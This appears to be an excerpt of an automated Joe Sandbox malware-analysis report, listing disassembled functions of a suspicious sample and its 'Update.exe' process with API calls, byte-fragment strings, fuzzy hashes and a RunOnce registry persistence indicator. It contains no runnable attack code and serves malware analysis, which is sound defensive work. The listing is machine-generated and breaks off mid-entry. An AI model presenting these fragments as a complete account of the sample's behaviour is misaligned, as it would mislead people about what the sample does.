Opcode Fuzzy Hash: 0f8e8d1ea80ee7131221c7b85965cb56b28886a5743c20840bf3d7fb5bd1bba6
Instruction Fuzzy Hash: 6D110636204B016B9E1077B89C85E2B2659EBD23FFF290224FD34D62E2EE648D0C5535

Uniqueness

Uniqueness Score: -1.00%

Function 00D42304 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003), ref: 00D42373
VerSetConditionMask.KERNEL32(00000000), ref: 00D42377
VerSetConditionMask.KERNEL32(00000000), ref: 00D4237B
VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00D4239E

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersion
String ID:
API String ID: 2793162063-0
Opcode ID: 50726289ba147f0fec7e3a76fbc8e464b0bdd51ee87ee9ae3dbf8f8e1dfe03a0
Instruction ID: 3ad9e9f1c7209fdfa4887457aee9fd72ba1a2c8e8b096ea826bb4bdf86d1c96d
Opcode Fuzzy Hash: 50726289ba147f0fec7e3a76fbc8e464b0bdd51ee87ee9ae3dbf8f8e1dfe03a0
Instruction Fuzzy Hash: 13110070E4031CAADB259F569C0AFDFBBBCEF84700F00409AA508E6281D6B45B458EA5

Uniqueness

Uniqueness Score: -1.00%

Function 00D4C764 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00D4C77E

Part of subcall function 00D4C6CB: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00D4C6FA
Part of subcall function 00D4C6CB: ___AdjustPointer.LIBCMT ref: 00D4C715

_UnwindNestedFrames.LIBCMT ref: 00D4C793
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00D4C7A4
CallCatchBlock.LIBVCRUNTIME ref: 00D4C7CC

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 7f1554208b8291d4600e071a02a8dc748a10a8dc1a4203ada605b9e4f17f777d
Instruction ID: 97a1ca993d3e136edceea695813c9b57f429720214313fad7fda0be28ed1bdcb
Opcode Fuzzy Hash: 7f1554208b8291d4600e071a02a8dc748a10a8dc1a4203ada605b9e4f17f777d
Instruction Fuzzy Hash: 85010832201148BBDF126F95CC85EEF7B6AEF98754F085018FE48A6121D736E861DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D5C8C5 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000,?,?,00D5B692,?,00000001,?,?,?,00D5A0BC), ref: 00D5C8DC
GetLastError.KERNEL32(?,00D5B692,?,00000001,?,?,?,00D5A0BC), ref: 00D5C8E8

Part of subcall function 00D5C8AE: CloseHandle.KERNEL32(FFFFFFFE,00D5C8F8,?,00D5B692,?,00000001,?,?,?,00D5A0BC), ref: 00D5C8BE

___initconout.LIBCMT ref: 00D5C8F8

Part of subcall function 00D5C870: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00D5C89F,00D5B67F,?,?,00D5A0BC), ref: 00D5C883

WriteConsoleW.KERNEL32(?,?,?,00000000,?,00D5B692,?,00000001,?,?,?,00D5A0BC), ref: 00D5C90D

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 681dea75e21fa65ba7f20ef3a438a79cbdb30e86913cd2ba33769eb6313985a9
Instruction ID: 09d58cb3c8552482a65208acf4e02e4f176e29b2639c2035360477b5db0b9a18
Opcode Fuzzy Hash: 681dea75e21fa65ba7f20ef3a438a79cbdb30e86913cd2ba33769eb6313985a9
Instruction Fuzzy Hash: 30F0AC36511354BFCF222F99DD05A993FA6EB093A2B054024FF18D6221D6328920EFB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D5205C Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00D52065

Part of subcall function 00D5363A: HeapFree.KERNEL32(00000000,00000000,?,00D56D47,?,00000000,?,?,?,00D56D6E,?,00000007,?,?,00D571E8,?), ref: 00D53650
Part of subcall function 00D5363A: GetLastError.KERNEL32(?,?,00D56D47,?,00000000,?,?,?,00D56D6E,?,00000007,?,?,00D571E8,?,?), ref: 00D53662

_free.LIBCMT ref: 00D52078
_free.LIBCMT ref: 00D52089
_free.LIBCMT ref: 00D5209A

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 462df92a34d48ea8ffdeb7ceedc1291edd566663ff058fdf5fa12a8ac3c9ebaa
Instruction ID: 16ce11874aa21bfe6435664744ef88e7a2ce4eb50df0a612a00a5ca69a446763
Opcode Fuzzy Hash: 462df92a34d48ea8ffdeb7ceedc1291edd566663ff058fdf5fa12a8ac3c9ebaa
Instruction Fuzzy Hash: 9BE0B679910365AB8A1A7F15FD028493F6AF7B47B6301010BFC28D3331D7B10696AAF9

Uniqueness

Uniqueness Score: -1.00%

Function 00D48465 Relevance: 5.4, APIs: 4, Instructions: 358stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,00D67574,?,DB897938,?,?,?,?,?,00D5E1C6,000000FF), ref: 00D484E8
lstrcmpiW.KERNEL32(?,00D67578,?,?,?,?,?,00D5E1C6,000000FF), ref: 00D484FE

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 97849907f86366c7be9393a17c2f64b192d748d1d85d4da45dca8dc53dd7d497
Instruction ID: 1e756739944664bfc6a514425a8ad4224385fd005508736fb87848be9dc19771
Opcode Fuzzy Hash: 97849907f86366c7be9393a17c2f64b192d748d1d85d4da45dca8dc53dd7d497
Instruction Fuzzy Hash: 84D1D771D00218DBDB25DB28CC84AEDB7B5EF18380F1541AAE649E7240DB309E99EF71

Uniqueness

Uniqueness Score: -1.00%

Function 00D4A648 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00D4AC4E

Part of subcall function 00D4C3D9: RaiseException.KERNEL32(?,?,?,00D4AC70,?,?,00000000,?,?,?,?,?,00D4AC70,?,00D68920), ref: 00D4C439

__CxxThrowException@8.LIBVCRUNTIME ref: 00D4AC6B

Strings

Unknown exception, xrefs: 00D4AC78

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: f8bc29954df7da72f6d0d5eb92cc501ab41acbf195e87c7bf7446a93c32b3d39
Instruction ID: 00a3bbd75cf3c8f05135ac6a71501678c1dadcaf16a816aa8cc52059decb1aee
Opcode Fuzzy Hash: f8bc29954df7da72f6d0d5eb92cc501ab41acbf195e87c7bf7446a93c32b3d39
Instruction Fuzzy Hash: 42F0C23898020DB7CF00BB6CE84AD6D776CDB00350FA48221BC25D6491FF70DA0985F6

Uniqueness

Uniqueness Score: -1.00%

Function 00D41847 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00020006), ref: 00D4189A

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00D41868
SquirrelInstall, xrefs: 00D418A8

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: FileModuleName
String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce$SquirrelInstall
API String ID: 514040917-3364363029
Opcode ID: 95aabce75f3168635617d131777e13652d089ea2bb620ec3e7fc72ba928fd609
Instruction ID: 7ccd849784ac93b72eb8933c486cca21720606ca7e961d3ce255b9694b0674cd
Opcode Fuzzy Hash: 95aabce75f3168635617d131777e13652d089ea2bb620ec3e7fc72ba928fd609
Instruction Fuzzy Hash: 87011775A8031CAFD710EF64DDC5AE9B378EB14304F4001A9A515A6191EA705FC88EB0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Update.exePID: 7188, Parent PID: 7172COMMON

Executed Functions

Function 00007FFB4B1A0F18 Relevance: 19.7, Strings: 15, Instructions: 957COMMON

Download Yara Rule

Strings

HAK, xrefs: 00007FFB4B1A2CF6
HAK, xrefs: 00007FFB4B1A2B2D
HAK, xrefs: 00007FFB4B1A3083
HAK, xrefs: 00007FFB4B1A2AEA
@`'K, xrefs: 00007FFB4B1A2F23
HAK, xrefs: 00007FFB4B1A2E04
wR_H, xrefs: 00007FFB4B1A2B93
rR_H, xrefs: 00007FFB4B1A308D
HAK, xrefs: 00007FFB4B1A2A44
HAK, xrefs: 00007FFB4B1A2BAB
HAK, xrefs: 00007FFB4B1A2D7D
HAK, xrefs: 00007FFB4B1A2E26
HAK, xrefs: 00007FFB4B1A2B89
HAK, xrefs: 00007FFB4B1A2D36
HAK, xrefs: 00007FFB4B1A2DBD

Memory Dump Source

Source File: 00000003.00000002.1409287993.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b1a0000_Update.jbxd

Similarity

API ID:
String ID: @`'K$HAK$HAK$HAK$HAK$HAK$HAK$HAK$HAK$HAK$HAK$HAK$HAK$rR_H$wR_H
API String ID: 0-1556396765
Opcode ID: 7695f3431c41b26843b47456815e9e28f74a88e50bc5ff10cecc3a6cc67f3a18
Instruction ID: f958917d745886d2c2f728e855016daa0955ba9a8b2c1e102d030fda322c81cb
Opcode Fuzzy Hash: 7695f3431c41b26843b47456815e9e28f74a88e50bc5ff10cecc3a6cc67f3a18
Instruction Fuzzy Hash: EA4227A1B2C90A4BEB69AA3CD84627977D1EF8D714F10427AD54DC32E6DD28BC0387C1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B1AE62B Relevance: 7.6, Strings: 5, Instructions: 1376COMMON

Download Yara Rule

Strings

HAK, xrefs: 00007FFB4B1AF15F
HAK, xrefs: 00007FFB4B1AE752
HAK, xrefs: 00007FFB4B1AF1A8
x+K, xrefs: 00007FFB4B1AEC84
8+K, xrefs: 00007FFB4B1AED58

Memory Dump Source

Source File: 00000003.00000002.1409287993.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b1a0000_Update.jbxd

Similarity

API ID:
String ID: 8+K$HAK$HAK$HAK$x+K
API String ID: 0-2762029844
Opcode ID: 974e69d97db15a41d6de02479629e974686c229525fac2b9930c6b89877eb0bb
Instruction ID: 4968d91beed2fa7990e20c3ce69b6da64ce1dc30b4ab57b340f33a1ffb3f06d0
Opcode Fuzzy Hash: 974e69d97db15a41d6de02479629e974686c229525fac2b9930c6b89877eb0bb
Instruction Fuzzy Hash: 8B92D5B1A1CA4E4FDB95EF28C8956A977E1FF98304F1445B9D40DC7296DE34B842CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B1A0F25 Relevance: 2.9, Strings: 2, Instructions: 425COMMON

Download Yara Rule

Strings

4L_^, xrefs: 00007FFB4B1A1001
3L_^, xrefs: 00007FFB4B1A1101

Memory Dump Source

Source File: 00000003.00000002.1409287993.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b1a0000_Update.jbxd

Similarity

API ID:
String ID: 3L_^$4L_^
API String ID: 0-4024852540
Opcode ID: 3ecede53c665d92de9edf0573d50c81db582533507f7e89e682584a8d90f2887
Instruction ID: 6d4bcdd2e394cad5e3bd112b000f5f6f316ba490197206aaf81fe043557f5784
Opcode Fuzzy Hash: 3ecede53c665d92de9edf0573d50c81db582533507f7e89e682584a8d90f2887
Instruction Fuzzy Hash: 84C1FAE790D5A24BD306BB7CF9970E53B94DF03A3870851B3D5C989093ED28644F8AE5

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B1C337D Relevance: 1.2, Instructions: 1150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1409287993.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b1a0000_Update.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8793a3890b85c0eb615c520164a1d7ae1a6d75e8ccfe927fc4f2ee83027e54bf
Instruction ID: d1aba97f46a9142ffbbd0e0f6f89dbb9dbd10224cfa200ff2b39360fcd0d3221
Opcode Fuzzy Hash: 8793a3890b85c0eb615c520164a1d7ae1a6d75e8ccfe927fc4f2ee83027e54bf
Instruction Fuzzy Hash: 5782C2B0A2CB098FD368DF29D481571B7E1FB58714B14866DC18BC7AA6DA35F8438B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B1C1675 Relevance: 15.5, Strings: 12, Instructions: 549COMMON

Download Yara Rule

Strings

HAK, xrefs: 00007FFB4B1C16CA
HAK, xrefs: 00007FFB4B1C1A86
HAK, xrefs: 00007FFB4B1C19A1
HAK, xrefs: 00007FFB4B1C1968
HAK, xrefs: 00007FFB4B1C1A14
HAK, xrefs: 00007FFB4B1C1B58
hk0K, xrefs: 00007FFB4B1C198A
hk0K, xrefs: 00007FFB4B1C1B41
hk0K, xrefs: 00007FFB4B1C1951
hk0K, xrefs: 00007FFB4B1C1AE4
HAK, xrefs: 00007FFB4B1C19DA
HAK, xrefs: 00007FFB4B1C1A4D

Memory Dump Source

Source File: 00000003.00000002.1409287993.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b1a0000_Update.jbxd

Similarity

API ID:
String ID: HAK$HAK$HAK$HAK$HAK$HAK$HAK$HAK$hk0K$hk0K$hk0K$hk0K
API String ID: 0-482514938
Opcode ID: 5905d435991dc789c6ae6fdb617170bb48939f823f0138338222ac30308bb812
Instruction ID: e67b9432defbca69f4c4c7172b07f2c4f4f2b5024b6522ac16f09e11958893ac
Opcode Fuzzy Hash: 5905d435991dc789c6ae6fdb617170bb48939f823f0138338222ac30308bb812
Instruction Fuzzy Hash: 4AF118B1A2CE464FE7A8EA3DC55527573E1FF58704F14417DD68EC32A2DD28AC628B80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B1A2000 Relevance: 12.9, Strings: 10, Instructions: 351COMMON

Download Yara Rule

Strings

HAK, xrefs: 00007FFB4B1A2305
HAK, xrefs: 00007FFB4B1A2292
HAK, xrefs: 00007FFB4B1A21EF
HAK, xrefs: 00007FFB4B1A2341
HAK, xrefs: 00007FFB4B1A2242
HAK, xrefs: 00007FFB4B1A21B5
HAK, xrefs: 00007FFB4B1A2358
HAK, xrefs: 00007FFB4B1A227B
HAK, xrefs: 00007FFB4B1A22E3
HAK, xrefs: 00007FFB4B1A2206

Memory Dump Source

Source File: 00000003.00000002.1409287993.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b1a0000_Update.jbxd

Similarity

API ID:
String ID: HAK$HAK$HAK$HAK$HAK$HAK$HAK$HAK$HAK$HAK
API String ID: 0-4275846752
Opcode ID: 0527685994c4e378ec37ebd387ef594731fb7bea431bc073f60095d9be5b7c4a
Instruction ID: 018f92d6b5bd7b41316c89610c0a31b32e1b2721273a14e53e7c18cb359a8be5
Opcode Fuzzy Hash: 0527685994c4e378ec37ebd387ef594731fb7bea431bc073f60095d9be5b7c4a
Instruction Fuzzy Hash: 67A12BA2B2CA4A4FEBA9AE3C845627567C1EF9D754F44407AD14DC31E2DD2CBC4287C1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B1B1969 Relevance: 9.5, Strings: 7, Instructions: 768COMMON

Download Yara Rule

Strings

B)K, xrefs: 00007FFB4B1B19EE
HAK, xrefs: 00007FFB4B1B1F20
HAK, xrefs: 00007FFB4B1B1DD2
B)K, xrefs: 00007FFB4B1B1C99
h,+K, xrefs: 00007FFB4B1B19CC
xf+K, xrefs: 00007FFB4B1B1C23
HAK, xrefs: 00007FFB4B1B1EE6

Memory Dump Source

Source File: 00000003.00000002.1409287993.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b1a0000_Update.jbxd

Similarity

API ID:
String ID: B)K$B)K$HAK$HAK$HAK$h,+K$xf+K
API String ID: 0-2263172744
Opcode ID: 8c57bdc81a114aa0e3c0937cfcd13e51d8361f87e677e4e14943c0d643bda7a9
Instruction ID: a05e874fc7101e94058a7beb1403c96db6109e9f874c054f187d279d84475141
Opcode Fuzzy Hash: 8c57bdc81a114aa0e3c0937cfcd13e51d8361f87e677e4e14943c0d643bda7a9
Instruction Fuzzy Hash: 85228C92B3DE4A0FE759AF3CD8961B437C1EF99A54B0581BED54DC31EBDC18AC224680

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B1B4CAD Relevance: 9.1, Strings: 7, Instructions: 339COMMON

Download Yara Rule

Strings

HAK, xrefs: 00007FFB4B1B4EC3
HAK, xrefs: 00007FFB4B1B4E87
TQ_H, xrefs: 00007FFB4B1B4E91
HAK, xrefs: 00007FFB4B1B4F38
HAK, xrefs: 00007FFB4B1B4DC1
HAK, xrefs: 00007FFB4B1B4DFF
HAK, xrefs: 00007FFB4B1B4F7F

Memory Dump Source

Source File: 00000003.00000002.1409287993.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b1a0000_Update.jbxd

Similarity

API ID:
String ID: HAK$HAK$HAK$HAK$HAK$HAK$TQ_H
API String ID: 0-3199345178
Opcode ID: 989c0fd8c3cf2da4a1b3cd0ccbbe94dfed708ed8db7d3ed8729310c8ad754bed
Instruction ID: 5e60056b3ab5dc78e7e24792c28b2186ee3f560f0807d0090bb30954dcc4eb3c
Opcode Fuzzy Hash: 989c0fd8c3cf2da4a1b3cd0ccbbe94dfed708ed8db7d3ed8729310c8ad754bed
Instruction Fuzzy Hash: BE9109A2B2CD490FEBA9BA3C94561B82BD2EFD875470581BAD24DC32E3DD1C6C074781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B1A6FF2 Relevance: 9.0, Strings: 7, Instructions: 237COMMON

Download Yara Rule

Strings

H^(K, xrefs: 00007FFB4B1A7049
8^(K, xrefs: 00007FFB4B1A7029
h^(K, xrefs: 00007FFB4B1A7089
P^(K, xrefs: 00007FFB4B1A7059
@^(K, xrefs: 00007FFB4B1A7039
`^(K, xrefs: 00007FFB4B1A7079
X^(K, xrefs: 00007FFB4B1A7069

Memory Dump Source

Source File: 00000003.00000002.1409287993.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b1a0000_Update.jbxd

Similarity

API ID:
String ID: 8^(K$@^(K$H^(K$P^(K$X^(K$`^(K$h^(K
API String ID: 0-2657836981
Opcode ID: 8713cff2ef468427c838713f8c75cb2ce5831769007598211c5f683e36abc6d0
Instruction ID: 7792b02c7a35a0cb38d6b182ae3f3aefad1c10eb473d8a7740eb6aaf03279cd4
Opcode Fuzzy Hash: 8713cff2ef468427c838713f8c75cb2ce5831769007598211c5f683e36abc6d0
Instruction Fuzzy Hash: 7E613ED391DAC64FF346AA7CDDD11A46FD0EF5A65470883F7D1888A0D7EC24A9468780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B1BC7E0 Relevance: 7.9, Strings: 6, Instructions: 369COMMON

Download Yara Rule

Strings

HAK, xrefs: 00007FFB4B1BCA8F
p.K, xrefs: 00007FFB4B1BC8DF
(.K, xrefs: 00007FFB4B1BCAF1
PK00, xrefs: 00007FFB4B1BC915
p.K, xrefs: 00007FFB4B1BC822
ZJ_H, xrefs: 00007FFB4B1BCA6D

Memory Dump Source

Source File: 00000003.00000002.1409287993.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b1a0000_Update.jbxd

Similarity

API ID:
String ID: (.K$HAK$PK00$ZJ_H$p.K$p.K
API String ID: 0-1285137921
Opcode ID: b6320adfc88bed69e6de66e213b85a300408f5d98661e9f01564fda5de306699
Instruction ID: 1f452a09179b5aac810f1f0ca895d9ea7ec8b17ab4d7dea50884aa14dfcea517
Opcode Fuzzy Hash: b6320adfc88bed69e6de66e213b85a300408f5d98661e9f01564fda5de306699
Instruction Fuzzy Hash: 04B14B61B2C9864FE7A8FE3CD45527977C1EF98B14F0481BAD15EC32A6ED24AC418B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B1BB7F8 Relevance: 7.0, Strings: 5, Instructions: 701COMMON

Download Yara Rule

Strings

0J_H, xrefs: 00007FFB4B1BF474
HAK, xrefs: 00007FFB4B1BF448
p*0K, xrefs: 00007FFB4B1BF257
HAK, xrefs: 00007FFB4B1BF481
HAK, xrefs: 00007FFB4B1BF40F

Memory Dump Source

Source File: 00000003.00000002.1409287993.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b1a0000_Update.jbxd

Similarity

API ID:
String ID: 0J_H$HAK$HAK$HAK$p*0K
API String ID: 0-4001318700
Opcode ID: dbe65355874577e565099dcdeec6ac57abaf7a579faa8e958b5315d9cec4ec92
Instruction ID: afb18b13696153ce1b5af365dd0c3243b6b29e133fd2aade947f391bcc2e3869
Opcode Fuzzy Hash: dbe65355874577e565099dcdeec6ac57abaf7a579faa8e958b5315d9cec4ec92
Instruction Fuzzy Hash: 7A222671A1CA4A4FE798EF3CC49567577E2FF99714B0441BED44AC72A6DE24EC028B80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B1AB07D Relevance: 5.7, Strings: 4, Instructions: 652COMMON

Download Yara Rule

Strings

HAK, xrefs: 00007FFB4B1AB5E9
HAK, xrefs: 00007FFB4B1AB528
HAK, xrefs: 00007FFB4B1AB5A5
HAK, xrefs: 00007FFB4B1AB561

Memory Dump Source

Source File: 00000003.00000002.1409287993.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b1a0000_Update.jbxd

Similarity

API ID:
String ID: HAK$HAK$HAK$HAK
API String ID: 0-3143023613
Opcode ID: 238623d82bd83d7a2403d2b6f545ee53d578b1116647e6f6278ae83310ba7e7a
Instruction ID: 2bc569323a4ecd7e5364f59a1645c80546ec392cbb897fe415eb38c0436b377a
Opcode Fuzzy Hash: 238623d82bd83d7a2403d2b6f545ee53d578b1116647e6f6278ae83310ba7e7a
Instruction Fuzzy Hash: 2E12F7B1A2CA4A4FE78AEF3CD45567937D1EF99314F1441BAD90DC72A2DE28BC028741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B1B00D3 Relevance: 5.4, Strings: 4, Instructions: 448COMMON

Download Yara Rule

Strings

B)K, xrefs: 00007FFB4B1B0220
HAK, xrefs: 00007FFB4B1B2478
HAK, xrefs: 00007FFB4B1B24EC
HAK, xrefs: 00007FFB4B1B24B2

Memory Dump Source

Source File: 00000003.00000002.1409287993.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b1a0000_Update.jbxd

Similarity

API ID:
String ID: B)K$HAK$HAK$HAK
API String ID: 0-1188019900
Opcode ID: 39f82d4000895c0c7b5bd086bef15b98becf2f78fb6fb3f16d425c82302b1008
Instruction ID: f03caba8d7c15c9096c851340d31e6d45f56d4f40b54049f753cfcf9faca5b47
Opcode Fuzzy Hash: 39f82d4000895c0c7b5bd086bef15b98becf2f78fb6fb3f16d425c82302b1008
Instruction Fuzzy Hash: CFC15E93A1DE8A0FE75AEA3CD8591B47FC0EF56A6870442FBD18DC71E3DC146C068690

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B1BA1FB Relevance: 5.4, Strings: 4, Instructions: 385COMMON

Download Yara Rule

Strings

HAK, xrefs: 00007FFB4B1BA382
@M.K, xrefs: 00007FFB4B1BA3F8
Hx-K, xrefs: 00007FFB4B1BA32C
p, xrefs: 00007FFB4B1BA23C

Memory Dump Source

